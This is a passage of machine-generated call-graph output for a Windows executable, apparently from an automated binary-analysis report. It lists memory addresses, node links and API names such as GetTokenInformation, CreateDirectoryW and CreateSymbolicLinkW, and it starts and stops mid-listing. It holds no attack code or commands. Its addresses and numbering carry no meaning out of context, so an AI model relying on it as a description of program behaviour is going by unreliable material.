7ff75714a4b1 17187->17189 17190 7ff757144f08 _get_daylight 11 API calls 17188->17190 17189->17188 17191 7ff75714a4d6 17189->17191 17195 7ff75714a4c2 17190->17195 17193 7ff75714a4ce 17191->17193 17194 7ff757144f08 _get_daylight 11 API calls 17191->17194 17192 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 17192->17193 17193->17170 17193->17178 17194->17195 17195->17192 17229 7ff7571540ac 17196->17229 17200 7ff75714e3ac 17201 7ff75714e401 17200->17201 17203 7ff75714e3cc 17200->17203 17205 7ff75714e3b0 17200->17205 17282 7ff75714def0 17201->17282 17278 7ff75714e1ac 17203->17278 17205->17170 17207 7ff7571540ac 38 API calls 17206->17207 17208 7ff75714e11e 17207->17208 17209 7ff757153af4 37 API calls 17208->17209 17210 7ff75714e16e 17209->17210 17211 7ff75714e172 17210->17211 17212 7ff75714e1ac 45 API calls 17210->17212 17211->17170 17212->17211 17214 7ff7571540ac 38 API calls 17213->17214 17215 7ff75714de3f 17214->17215 17216 7ff757153af4 37 API calls 17215->17216 17217 7ff75714de97 17216->17217 17218 7ff75714de9b 17217->17218 17219 7ff75714def0 45 API calls 17217->17219 17218->17170 17219->17218 17221 7ff75714dad4 17220->17221 17222 7ff75714daa1 17220->17222 17224 7ff75714daec 17221->17224 17225 7ff75714db6d 17221->17225 17223 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17222->17223 17226 7ff75714dacd __scrt_get_show_window_mode 17223->17226 17227 7ff75714ddf4 46 API calls 17224->17227 17225->17226 17228 7ff7571447c0 45 API calls 17225->17228 17226->17170 17227->17226 17228->17226 17230 7ff7571540ff fegetenv 17229->17230 17231 7ff757157e2c 37 API calls 17230->17231 17234 7ff757154152 17231->17234 17232 7ff75715417f 17236 7ff75714a4a4 __std_exception_copy 37 API calls 17232->17236 17233 7ff757154242 17235 7ff757157e2c 37 API calls 17233->17235 17234->17233 17239 7ff75715421c 17234->17239 17240 7ff75715416d 17234->17240 17237 7ff75715426c 17235->17237 17238 7ff7571541fd 17236->17238 17241 7ff757157e2c 37 API calls 17237->17241 17242 7ff757155324 17238->17242 17248 7ff757154205 17238->17248 17243 7ff75714a4a4 __std_exception_copy 37 API calls 17239->17243 17240->17232 17240->17233 17244 7ff75715427d 17241->17244 17246 7ff75714a900 _isindst 17 API calls 17242->17246 17243->17238 17245 7ff757158020 20 API calls 17244->17245 17253 7ff7571542e6 __scrt_get_show_window_mode 17245->17253 17247 7ff757155339 17246->17247 17249 7ff75713c550 _log10_special 8 API calls 17248->17249 17250 7ff75714e351 17249->17250 17274 7ff757153af4 17250->17274 17251 7ff757154327 memcpy_s 17267 7ff757154783 memcpy_s __scrt_get_show_window_mode 17251->17267 17272 7ff757154c6b memcpy_s __scrt_get_show_window_mode 17251->17272 17252 7ff75715468f __scrt_get_show_window_mode 17253->17251 17253->17252 17258 7ff757144f08 _get_daylight 11 API calls 17253->17258 17254 7ff757153c10 37 API calls 17259 7ff7571550e7 17254->17259 17255 7ff7571549cf 17255->17254 17256 7ff75715533c memcpy_s 37 API calls 17256->17255 17257 7ff75715497b 17257->17255 17257->17256 17260 7ff757154760 17258->17260 17263 7ff75715533c memcpy_s 37 API calls 17259->17263 17271 7ff757155142 17259->17271 17261 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 17260->17261 17261->17251 17262 7ff7571552c8 17264 7ff757157e2c 37 API calls 17262->17264 17263->17271 17264->17248 17265 7ff757144f08 11 API calls _get_daylight 17265->17272 17266 7ff757144f08 11 API calls _get_daylight 17266->17267 17267->17257 17267->17266 17269 7ff75714a8e0 37 API calls _invalid_parameter_noinfo 17267->17269 17268 7ff757153c10 37 API calls 17268->17271 17269->17267 17270 7ff75715533c memcpy_s 37 API calls 17270->17271 17271->17262 17271->17268 17271->17270 17272->17255 17272->17257 17272->17265 17273 7ff75714a8e0 37 API calls _invalid_parameter_noinfo 17272->17273 17273->17272 17275 7ff757153b13 17274->17275 17276 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17275->17276 17277 7ff757153b3e memcpy_s 17275->17277 17276->17277 17277->17200 17279 7ff75714e1d8 memcpy_s 17278->17279 17280 7ff7571447c0 45 API calls 17279->17280 17281 7ff75714e292 memcpy_s __scrt_get_show_window_mode 17279->17281 17280->17281 17281->17205 17283 7ff75714df2b 17282->17283 17284 7ff75714df78 memcpy_s 17282->17284 17285 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17283->17285 17287 7ff75714dfe3 17284->17287 17289 7ff7571447c0 45 API calls 17284->17289 17286 7ff75714df57 17285->17286 17286->17205 17288 7ff75714a4a4 __std_exception_copy 37 API calls 17287->17288 17292 7ff75714e025 memcpy_s 17288->17292 17289->17287 17290 7ff75714a900 _isindst 17 API calls 17291 7ff75714e0d0 17290->17291 17292->17290 17294 7ff757140c5f 17293->17294 17295 7ff757140c4e 17293->17295 17294->17295 17296 7ff75714d5fc _fread_nolock 12 API calls 17294->17296 17295->17113 17297 7ff757140c90 17296->17297 17298 7ff757140ca4 17297->17298 17300 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17297->17300 17299 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17298->17299 17299->17295 17300->17298 17302 7ff757144766 17301->17302 17304 7ff75714476e 17301->17304 17303 7ff7571447c0 45 API calls 17302->17303 17303->17304 17304->17124 17306 7ff75714d9d1 17305->17306 17308 7ff7571447ff 17305->17308 17307 7ff757153304 45 API calls 17306->17307 17306->17308 17307->17308 17309 7ff75714da24 17308->17309 17310 7ff75714da3d 17309->17310 17312 7ff75714480f 17309->17312 17311 7ff757152650 45 API calls 17310->17311 17310->17312 17311->17312 17312->17046 17319 7ff757156d88 17313->17319 17317 7ff75714f8a9 MultiByteToWideChar 17316->17317 17322 7ff757156dec 17319->17322 17320 7ff75713c550 _log10_special 8 API calls 17321 7ff7571500bd 17320->17321 17321->17148 17322->17320 17324 7ff757140ffd 17323->17324 17325 7ff75714100f 17323->17325 17326 7ff757144f08 _get_daylight 11 API calls 17324->17326 17328 7ff75714101d 17325->17328 17332 7ff757141059 17325->17332 17327 7ff757141002 17326->17327 17329 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 17327->17329 17330 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17328->17330 17339 7ff75714100d 17329->17339 17330->17339 17331 7ff7571413d5 17333 7ff757144f08 _get_daylight 11 API calls 17331->17333 17331->17339 17332->17331 17334 7ff757144f08 _get_daylight 11 API calls 17332->17334 17335 7ff757141669 17333->17335 17336 7ff7571413ca 17334->17336 17337 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 17335->17337 17338 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 17336->17338 17337->17339 17338->17331 17339->17011 17341 7ff757140704 17340->17341 17368 7ff757140464 17341->17368 17343 7ff75714071d 17343->16664 17380 7ff7571403bc 17344->17380 17348 7ff75713c850 17347->17348 17349 7ff757132930 GetCurrentProcessId 17348->17349 17350 7ff757131c80 49 API calls 17349->17350 17351 7ff757132979 17350->17351 17394 7ff757144984 17351->17394 17356 7ff757131c80 49 API calls 17357 7ff7571329ff 17356->17357 17424 7ff757132620 17357->17424 17360 7ff75713c550 _log10_special 8 API calls 17361 7ff757132a31 17360->17361 17361->16703 17363 7ff757140119 17362->17363 17364 7ff757131b89 17362->17364 17365 7ff757144f08 _get_daylight 11 API calls 17363->17365 17364->16702 17364->16703 17366 7ff75714011e 17365->17366 17367 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 17366->17367 17367->17364 17369 7ff7571404ce 17368->17369 17370 7ff75714048e 17368->17370 17369->17370 17372 7ff7571404da 17369->17372 17371 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17370->17371 17373 7ff7571404b5 17371->17373 17379 7ff75714546c EnterCriticalSection 17372->17379 17373->17343 17381 7ff7571403e6 17380->17381 17392 7ff757131a20 17380->17392 17382 7ff757140432 17381->17382 17385 7ff7571403f5 __scrt_get_show_window_mode 17381->17385 17381->17392 17393 7ff75714546c EnterCriticalSection 17382->17393 17386 7ff757144f08 _get_daylight 11 API calls 17385->17386 17388 7ff75714040a 17386->17388 17390 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 17388->17390 17390->17392 17392->16671 17392->16672 17395 7ff7571449de 17394->17395 17396 7ff757144a03 17395->17396 17398 7ff757144a3f 17395->17398 17397 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17396->17397 17400 7ff757144a2d 17397->17400 17433 7ff757142c10 17398->17433 17402 7ff75713c550 _log10_special 8 API calls 17400->17402 17401 7ff757144b1c 17403 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17401->17403 17404 7ff7571329c3 17402->17404 17403->17400 17412 7ff757145160 17404->17412 17406 7ff757144af1 17409 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17406->17409 17407 7ff757144b40 17407->17401 17408 7ff757144b4a 17407->17408 17411 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17408->17411 17409->17400 17410 7ff757144ae8 17410->17401 17410->17406 17411->17400 17413 7ff75714b2c8 _get_daylight 11 API calls 17412->17413 17414 7ff757145177 17413->17414 17415 7ff7571329e5 17414->17415 17416 7ff75714eb98 _get_daylight 11 API calls 17414->17416 17417 7ff7571451b7 17414->17417 17415->17356 17418 7ff7571451ac 17416->17418 17417->17415 17571 7ff75714ec20 17417->17571 17419 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17418->17419 17419->17417 17422 7ff75714a900 _isindst 17 API calls 17423 7ff7571451fc 17422->17423 17425 7ff75713262f 17424->17425 17426 7ff757139390 2 API calls 17425->17426 17427 7ff757132660 17426->17427 17428 7ff75713266f MessageBoxW 17427->17428 17429 7ff757132683 MessageBoxA 17427->17429 17430 7ff757132690 17428->17430 17429->17430 17431 7ff75713c550 _log10_special 8 API calls 17430->17431 17432 7ff7571326a0 17431->17432 17432->17360 17434 7ff757142c4e 17433->17434 17435 7ff757142c3e 17433->17435 17436 7ff757142c57 17434->17436 17443 7ff757142c85 17434->17443 17438 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17435->17438 17439 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17436->17439 17437 7ff757142c7d 17437->17401 17437->17406 17437->17407 17437->17410 17438->17437 17439->17437 17440 7ff7571447c0 45 API calls 17440->17443 17442 7ff757142f34 17445 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17442->17445 17443->17435 17443->17437 17443->17440 17443->17442 17447 7ff7571435a0 17443->17447 17473 7ff757143268 17443->17473 17503 7ff757142af0 17443->17503 17445->17435 17448 7ff7571435e2 17447->17448 17449 7ff757143655 17447->17449 17452 7ff7571435e8 17448->17452 17453 7ff75714367f 17448->17453 17450 7ff75714365a 17449->17450 17451 7ff7571436af 17449->17451 17454 7ff75714365c 17450->17454 17455 7ff75714368f 17450->17455 17451->17453 17464 7ff7571436be 17451->17464 17471 7ff757143618 17451->17471 17460 7ff7571435ed 17452->17460 17452->17464 17520 7ff757141b50 17453->17520 17456 7ff7571435fd 17454->17456 17463 7ff75714366b 17454->17463 17527 7ff757141740 17455->17527 17472 7ff7571436ed 17456->17472 17506 7ff757143f04 17456->17506 17460->17456 17462 7ff757143630 17460->17462 17460->17471 17462->17472 17516 7ff7571443c0 17462->17516 17463->17453 17465 7ff757143670 17463->17465 17464->17472 17534 7ff757141f60 17464->17534 17468 7ff757144558 37 API calls 17465->17468 17465->17472 17467 7ff75713c550 _log10_special 8 API calls 17469 7ff757143983 17467->17469 17468->17471 17469->17443 17471->17472 17541 7ff75714e858 17471->17541 17472->17467 17474 7ff757143289 17473->17474 17475 7ff757143273 17473->17475 17476 7ff7571432c7 17474->17476 17477 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17474->17477 17475->17476 17478 7ff7571435e2 17475->17478 17479 7ff757143655 17475->17479 17476->17443 17477->17476 17481 7ff7571435e8 17478->17481 17482 7ff75714367f 17478->17482 17480 7ff75714365a 17479->17480 17484 7ff7571436af 17479->17484 17483 7ff75714368f 17480->17483 17487 7ff75714365c 17480->17487 17485 7ff7571435ed 17481->17485 17490 7ff7571436be 17481->17490 17486 7ff757141b50 38 API calls 17482->17486 17488 7ff757141740 38 API calls 17483->17488 17484->17482 17484->17490 17501 7ff757143618 17484->17501 17493 7ff757143630 17485->17493 17494 7ff7571435fd 17485->17494 17485->17501 17486->17501 17492 7ff75714366b 17487->17492 17487->17494 17488->17501 17489 7ff757143f04 47 API calls 17489->17501 17491 7ff757141f60 38 API calls 17490->17491 17502 7ff7571436ed 17490->17502 17491->17501 17492->17482 17495 7ff757143670 17492->17495 17496 7ff7571443c0 47 API calls 17493->17496 17493->17502 17494->17489 17494->17502 17498 7ff757144558 37 API calls 17495->17498 17495->17502 17496->17501 17497 7ff75713c550 _log10_special 8 API calls 17499 7ff757143983 17497->17499 17498->17501 17499->17443 17500 7ff75714e858 47 API calls 17500->17501 17501->17500 17501->17502 17502->17497 17554 7ff757140d14 17503->17554 17507 7ff757143f26 17506->17507 17508 7ff757140b80 12 API calls 17507->17508 17509 7ff757143f6e 17508->17509 17510 7ff75714e570 46 API calls 17509->17510 17511 7ff757144041 17510->17511 17512 7ff7571447c0 45 API calls 17511->17512 17515 7ff757144063 17511->17515 17512->17515 17513 7ff7571447c0 45 API calls 17514 7ff7571440ec 17513->17514 17514->17471 17515->17513 17515->17514 17515->17515 17517 7ff7571443d8 17516->17517 17519 7ff757144440 17516->17519 17518 7ff75714e858 47 API calls 17517->17518 17517->17519 17518->17519 17519->17471 17521 7ff757141b83 17520->17521 17522 7ff757141bb2 17521->17522 17524 7ff757141c6f 17521->17524 17523 7ff757140b80 12 API calls 17522->17523 17526 7ff757141bef 17522->17526 17523->17526 17525 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17524->17525 17525->17526 17526->17471 17528 7ff757141773 17527->17528 17529 7ff7571417a2 17528->17529 17531 7ff75714185f 17528->17531 17530 7ff757140b80 12 API calls 17529->17530 17533 7ff7571417df 17529->17533 17530->17533 17532 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17531->17532 17532->17533 17533->17471 17535 7ff757141f93 17534->17535 17536 7ff757141fc2 17535->17536 17538 7ff75714207f 17535->17538 17537 7ff757140b80 12 API calls 17536->17537 17540 7ff757141fff 17536->17540 17537->17540 17539 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17538->17539 17539->17540 17540->17471 17543 7ff75714e880 17541->17543 17542 7ff75714e8c5 17547 7ff75714e885 __scrt_get_show_window_mode 17542->17547 17550 7ff75714e8ae __scrt_get_show_window_mode 17542->17550 17551 7ff7571507e8 17542->17551 17543->17542 17545 7ff7571447c0 45 API calls 17543->17545 17543->17547 17543->17550 17544 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17544->17547 17545->17542 17547->17471 17550->17544 17550->17547 17553 7ff75715080c WideCharToMultiByte 17551->17553 17555 7ff757140d41 17554->17555 17556 7ff757140d53 17554->17556 17557 7ff757144f08 _get_daylight 11 API calls 17555->17557 17559 7ff757140d60 17556->17559 17563 7ff757140d9d 17556->17563 17558 7ff757140d46 17557->17558 17560 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 17558->17560 17561 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17559->17561 17562 7ff757140d51 17560->17562 17561->17562 17562->17443 17564 7ff757140e46 17563->17564 17566 7ff757144f08 _get_daylight 11 API calls 17563->17566 17564->17562 17565 7ff757144f08 _get_daylight 11 API calls 17564->17565 17567 7ff757140ef0 17565->17567 17568 7ff757140e3b 17566->17568 17569 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 17567->17569 17570 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 17568->17570 17569->17562 17570->17564 17575 7ff75714ec3d 17571->17575 17572 7ff75714ec42 17573 7ff7571451dd 17572->17573 17574 7ff757144f08 _get_daylight 11 API calls 17572->17574 17573->17415 17573->17422 17576 7ff75714ec4c 17574->17576 17575->17572 17575->17573 17578 7ff75714ec8c 17575->17578 17577 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 17576->17577 17577->17573 17578->17573 17579 7ff757144f08 _get_daylight 11 API calls 17578->17579 17579->17576 17581 7ff7571385b1 GetTokenInformation 17580->17581 17582 7ff757138633 __std_exception_destroy 17580->17582 17583 7ff7571385dd 17581->17583 17584 7ff7571385d2 GetLastError 17581->17584 17585 7ff75713864c 17582->17585 17586 7ff757138646 CloseHandle 17582->17586 17583->17582 17587 7ff7571385f9 GetTokenInformation 17583->17587 17584->17582 17584->17583 17585->16721 17586->17585 17587->17582 17588 7ff75713861c 17587->17588 17588->17582 17589 7ff757138626 ConvertSidToStringSidW 17588->17589 17589->17582 17591 7ff75713c850 17590->17591 17592 7ff757132b74 GetCurrentProcessId 17591->17592 17593 7ff7571326b0 48 API calls 17592->17593 17594 7ff757132bc7 17593->17594 17595 7ff757144bd8 48 API calls 17594->17595 17596 7ff757132c10 MessageBoxW 17595->17596 17597 7ff75713c550 _log10_special 8 API calls 17596->17597 17598 7ff757132c40 17597->17598 17598->16732 17600 7ff7571325e5 17599->17600 17601 7ff757144bd8 48 API calls 17600->17601 17602 7ff757132604 17601->17602 17602->16746 17648 7ff757148794 17603->17648 17607 7ff7571381dc 17606->17607 17608 7ff757139390 2 API calls 17607->17608 17609 7ff7571381fb 17608->17609 17610 7ff757138216 ExpandEnvironmentStringsW 17609->17610 17611 7ff757138203 17609->17611 17613 7ff75713823c __std_exception_destroy 17610->17613 17612 7ff757132810 49 API calls 17611->17612 17614 7ff75713820f __std_exception_destroy 17612->17614 17615 7ff757138240 17613->17615 17618 7ff757138253 17613->17618 17616 7ff75713c550 _log10_special 8 API calls 17614->17616 17617 7ff757132810 49 API calls 17615->17617 17619 7ff7571383af 17616->17619 17617->17614 17620 7ff757138261 GetDriveTypeW 17618->17620 17621 7ff7571382bf 17618->17621 17619->16745 17638 7ff757148238 17619->17638 17625 7ff7571382b0 17620->17625 17626 7ff757138295 17620->17626 17623 7ff757147e08 45 API calls 17621->17623 17624 7ff7571382d1 17623->17624 17627 7ff7571382d9 17624->17627 17632 7ff7571382ec 17624->17632 17771 7ff75714796c 17625->17771 17628 7ff757132810 49 API calls 17626->17628 17630 7ff757132810 49 API calls 17627->17630 17628->17614 17630->17614 17631 7ff75713834e CreateDirectoryW 17631->17614 17634 7ff75713835d GetLastError 17631->17634 17632->17631 17633 7ff7571326b0 48 API calls 17632->17633 17635 7ff757138328 CreateDirectoryW 17633->17635 17634->17614 17636 7ff75713836a GetLastError 17634->17636 17635->17632 17637 7ff757132c50 51 API calls 17636->17637 17637->17614 17639 7ff757148258 17638->17639 17640 7ff757148245 17638->17640 17787 7ff757147ebc 17639->17787 17642 7ff757144f08 _get_daylight 11 API calls 17640->17642 17644 7ff75714824a 17642->17644 17645 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 17644->17645 17646 7ff757148256 17645->17646 17646->16749 17689 7ff757151558 17648->17689 17748 7ff7571512d0 17689->17748 17769 7ff7571502d8 EnterCriticalSection 17748->17769 17772 7ff75714798a 17771->17772 17775 7ff7571479bd 17771->17775 17772->17775 17778 7ff757150474 17772->17778 17775->17614 17776 7ff75714a900 _isindst 17 API calls 17777 7ff7571479ed 17776->17777 17779 7ff757150481 17778->17779 17781 7ff75715048b 17778->17781 17779->17781 17785 7ff7571504a7 17779->17785 17780 7ff757144f08 _get_daylight 11 API calls 17782 7ff757150493 17780->17782 17781->17780 17783 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 17782->17783 17784 7ff7571479b9 17783->17784 17784->17775 17784->17776 17785->17784 17786 7ff757144f08 _get_daylight 11 API calls 17785->17786 17786->17782 17794 7ff7571502d8 EnterCriticalSection 17787->17794 17796 7ff75713456a 17795->17796 17797 7ff757139390 2 API calls 17796->17797 17798 7ff75713458f 17797->17798 17799 7ff75713c550 _log10_special 8 API calls 17798->17799 17800 7ff7571345b7 17799->17800 17800->16777 17802 7ff757137e2e 17801->17802 17803 7ff757131c80 49 API calls 17802->17803 17804 7ff757137f52 17802->17804 17809 7ff757137eb5 17803->17809 17805 7ff75713c550 _log10_special 8 API calls 17804->17805 17806 7ff757137f83 17805->17806 17806->16777 17807 7ff757131c80 49 API calls 17807->17809 17808 7ff757134560 10 API calls 17808->17809 17809->17804 17809->17807 17809->17808 17810 7ff757139390 2 API calls 17809->17810 17811 7ff757137f23 CreateDirectoryW 17810->17811 17811->17804 17811->17809 17813 7ff757131637 17812->17813 17814 7ff757131613 17812->17814 17815 7ff7571345c0 108 API calls 17813->17815 17933 7ff757131050 17814->17933 17817 7ff75713164b 17815->17817 17820 7ff757131682 17817->17820 17821 7ff757131653 17817->17821 17818 7ff757131618 17819 7ff75713162e 17818->17819 17822 7ff757132710 54 API calls 17818->17822 17819->16777 17824 7ff7571345c0 108 API calls 17820->17824 17823 7ff757144f08 _get_daylight 11 API calls 17821->17823 17822->17819 17825 7ff757131658 17823->17825 17826 7ff757131696 17824->17826 17827 7ff757132910 54 API calls 17825->17827 17828 7ff7571316b8 17826->17828 17829 7ff75713169e 17826->17829 17831 7ff757131671 17827->17831 17830 7ff7571406d4 73 API calls 17828->17830 17832 7ff757132710 54 API calls 17829->17832 17834 7ff7571316cd 17830->17834 17831->16777 17833 7ff7571316ae 17832->17833 17837 7ff75714004c 74 API calls 17833->17837 17835 7ff7571316f9 17834->17835 17836 7ff7571316d1 17834->17836 17839 7ff757131717 17835->17839 17840 7ff7571316ff 17835->17840 17838 7ff757144f08 _get_daylight 11 API calls 17836->17838 17841 7ff757131829 17837->17841 17842 7ff7571316d6 17838->17842 17845 7ff757131739 17839->17845 17856 7ff757131761 17839->17856 17911 7ff757131210 17840->17911 17841->16777 17844 7ff757132910 54 API calls 17842->17844 17851 7ff7571316ef __std_exception_destroy 17844->17851 17846 7ff757144f08 _get_daylight 11 API calls 17845->17846 17848 7ff75713173e 17846->17848 17847 7ff75714004c 74 API calls 17847->17833 17849 7ff757132910 54 API calls 17848->17849 17849->17851 17850 7ff75714039c _fread_nolock 53 API calls 17850->17856 17851->17847 17852 7ff7571317da 17853 7ff757144f08 _get_daylight 11 API calls 17852->17853 17855 7ff7571317ca 17853->17855 17859 7ff757132910 54 API calls 17855->17859 17856->17850 17856->17851 17856->17852 17857 7ff7571317c5 17856->17857 17964 7ff757140adc 17856->17964 17858 7ff757144f08 _get_daylight 11 API calls 17857->17858 17858->17855 17859->17851 17861 7ff75713718b 17860->17861 17863 7ff757137144 17860->17863 17861->16777 17863->17861 17997 7ff757145024 17863->17997 17865 7ff7571341a1 17864->17865 17866 7ff7571344e0 49 API calls 17865->17866 17867 7ff7571341db 17866->17867 17868 7ff7571344e0 49 API calls 17867->17868 17869 7ff7571341eb 17868->17869 17870 7ff75713420d 17869->17870 17871 7ff75713423c 17869->17871 18012 7ff757134110 17870->18012 17873 7ff757134110 51 API calls 17871->17873 17874 7ff75713423a 17873->17874 17875 7ff757134267 17874->17875 17876 7ff75713429c 17874->17876 18019 7ff757137cf0 17875->18019 17878 7ff757134110 51 API calls 17876->17878 17880 7ff7571342c0 17878->17880 17881 7ff757134110 51 API calls 17880->17881 17889 7ff757134312 17880->17889 17884 7ff7571342e9 17881->17884 17882 7ff757134393 17885 7ff757131950 115 API calls 17882->17885 17883 7ff757132710 54 API calls 17887 7ff757134297 17883->17887 17884->17889 17891 7ff757134110 51 API calls 17884->17891 17888 7ff75713439d 17885->17888 17886 7ff75713c550 _log10_special 8 API calls 17890 7ff757134435 17886->17890 17887->17886 17892 7ff7571343fe 17888->17892 17893 7ff7571343a5 17888->17893 17889->17882 17895 7ff75713438c 17889->17895 17896 7ff757134317 17889->17896 17899 7ff75713437b 17889->17899 17890->16777 17891->17889 17894 7ff757132710 54 API calls 17892->17894 18045 7ff757131840 17893->18045 17894->17896 17895->17893 17895->17896 17901 7ff757132710 54 API calls 17896->17901 17900 7ff757132710 54 API calls 17899->17900 17900->17896 17901->17887 17902 7ff7571343bc 17904 7ff757132710 54 API calls 17902->17904 17903 7ff7571343d2 17905 7ff757131600 118 API calls 17903->17905 17904->17887 17906 7ff7571343e0 17905->17906 17906->17887 17907 7ff757132710 54 API calls 17906->17907 17907->17887 17909 7ff757131c80 49 API calls 17908->17909 17910 7ff757134474 17909->17910 17910->16777 17912 7ff757131268 17911->17912 17913 7ff757131297 17912->17913 17914 7ff75713126f 17912->17914 17917 7ff7571312b1 17913->17917 17918 7ff7571312d4 17913->17918 17915 7ff757132710 54 API calls 17914->17915 17916 7ff757131282 17915->17916 17916->17851 17919 7ff757144f08 _get_daylight 11 API calls 17917->17919 17921 7ff7571312e6 17918->17921 17927 7ff757131309 memcpy_s 17918->17927 17920 7ff7571312b6 17919->17920 17922 7ff757132910 54 API calls 17920->17922 17923 7ff757144f08 _get_daylight 11 API calls 17921->17923 17928 7ff7571312cf __std_exception_destroy 17922->17928 17924 7ff7571312eb 17923->17924 17926 7ff757132910 54 API calls 17924->17926 17925 7ff75714039c _fread_nolock 53 API calls 17925->17927 17926->17928 17927->17925 17927->17928 17929 7ff7571313cf 17927->17929 17931 7ff757140adc 76 API calls 17927->17931 17932 7ff757140110 37 API calls 17927->17932 17928->17851 17930 7ff757132710 54 API calls 17929->17930 17930->17928 17931->17927 17932->17927 17934 7ff7571345c0 108 API calls 17933->17934 17935 7ff75713108c 17934->17935 17936 7ff7571310a9 17935->17936 17937 7ff757131094 17935->17937 17939 7ff7571406d4 73 API calls 17936->17939 17938 7ff757132710 54 API calls 17937->17938 17945 7ff7571310a4 __std_exception_destroy 17938->17945 17940 7ff7571310bf 17939->17940 17941 7ff7571310e6 17940->17941 17942 7ff7571310c3 17940->17942 17947 7ff7571310f7 17941->17947 17948 7ff757131122 17941->17948 17943 7ff757144f08 _get_daylight 11 API calls 17942->17943 17944 7ff7571310c8 17943->17944 17946 7ff757132910 54 API calls 17944->17946 17945->17818 17958 7ff7571310e1 __std_exception_destroy 17946->17958 17949 7ff757144f08 _get_daylight 11 API calls 17947->17949 17950 7ff757131129 17948->17950 17953 7ff75713113c 17948->17953 17952 7ff757131100 17949->17952 17951 7ff757131210 92 API calls 17950->17951 17951->17958 17954 7ff757132910 54 API calls 17952->17954 17957 7ff75714039c _fread_nolock 53 API calls 17953->17957 17953->17958 17960 7ff7571311ed 17953->17960 17954->17958 17955 7ff75714004c 74 API calls 17956 7ff7571311b4 17955->17956 17956->17945 17968 7ff7571346f0 17956->17968 17957->17953 17958->17955 17961 7ff757144f08 _get_daylight 11 API calls 17960->17961 17962 7ff7571311f2 17961->17962 17963 7ff757132910 54 API calls 17962->17963 17963->17958 17965 7ff757140b0c 17964->17965 17982 7ff75714082c 17965->17982 17967 7ff757140b2a 17967->17856 17969 7ff757134700 17968->17969 17970 7ff757139390 2 API calls 17969->17970 17971 7ff75713472b 17970->17971 17972 7ff75713479e 17971->17972 17973 7ff757139390 2 API calls 17971->17973 17974 7ff75713c550 _log10_special 8 API calls 17972->17974 17975 7ff757134746 17973->17975 17976 7ff7571347b9 17974->17976 17975->17972 17977 7ff75713474b CreateSymbolicLinkW 17975->17977 17976->17945 17977->17972 17983 7ff75714084c 17982->17983 17988 7ff757140879 17982->17988 17984 7ff757140881 17983->17984 17985 7ff757140856 17983->17985 17983->17988 17989 7ff75714076c 17984->17989 17986 7ff75714a814 _invalid_parameter_noinfo 37 API calls 17985->17986 17986->17988 17988->17967 17996 7ff75714546c EnterCriticalSection 17989->17996 17998 7ff757145031 17997->17998 17999 7ff75714505e 17997->17999 18001 7ff757144f08 _get_daylight 11 API calls 17998->18001 18009 7ff757144fe8 17998->18009 18000 7ff757145081 17999->18000 18003 7ff75714509d 17999->18003 18002 7ff757144f08 _get_daylight 11 API calls 18000->18002 18004 7ff75714503b 18001->18004 18006 7ff757145086 18002->18006 18007 7ff757144f4c 45 API calls 18003->18007 18005 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 18004->18005 18008 7ff757145046 18005->18008 18010 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 18006->18010 18011 7ff757145091 18007->18011 18008->17863 18009->17863 18010->18011 18011->17863 18013 7ff757134136 18012->18013 18014 7ff757144984 49 API calls 18013->18014 18015 7ff75713415c 18014->18015 18016 7ff75713416d 18015->18016 18017 7ff757134560 10 API calls 18015->18017 18016->17874 18018 7ff75713417f 18017->18018 18018->17874 18020 7ff757137d05 18019->18020 18021 7ff7571345c0 108 API calls 18020->18021 18022 7ff757137d2b 18021->18022 18023 7ff7571345c0 108 API calls 18022->18023 18037 7ff757137d52 18022->18037 18024 7ff757137d42 18023->18024 18026 7ff757137d4d 18024->18026 18027 7ff757137d5c 18024->18027 18025 7ff75713c550 _log10_special 8 API calls 18028 7ff757134277 18025->18028 18029 7ff75714004c 74 API calls 18026->18029 18049 7ff7571400e4 18027->18049 18028->17883 18028->17887 18029->18037 18031 7ff757137d61 18034 7ff75714039c _fread_nolock 53 API calls 18031->18034 18036 7ff757137dc6 18031->18036 18038 7ff757140adc 76 API calls 18031->18038 18040 7ff757137dc1 18031->18040 18041 7ff757140110 37 API calls 18031->18041 18043 7ff757137dbf 18031->18043 18044 7ff7571400e4 37 API calls 18031->18044 18034->18031 18037->18025 18038->18031 18040->18043 18041->18031 18044->18031 18047 7ff757131865 18045->18047 18048 7ff7571318d5 18045->18048 18046 7ff757145024 45 API calls 18046->18047 18047->18046 18047->18048 18048->17902 18048->17903 18050 7ff7571400ed 18049->18050 18054 7ff7571400fd 18049->18054 18051 7ff757144f08 _get_daylight 11 API calls 18050->18051 18052 7ff7571400f2 18051->18052 18053 7ff75714a8e0 _invalid_parameter_noinfo 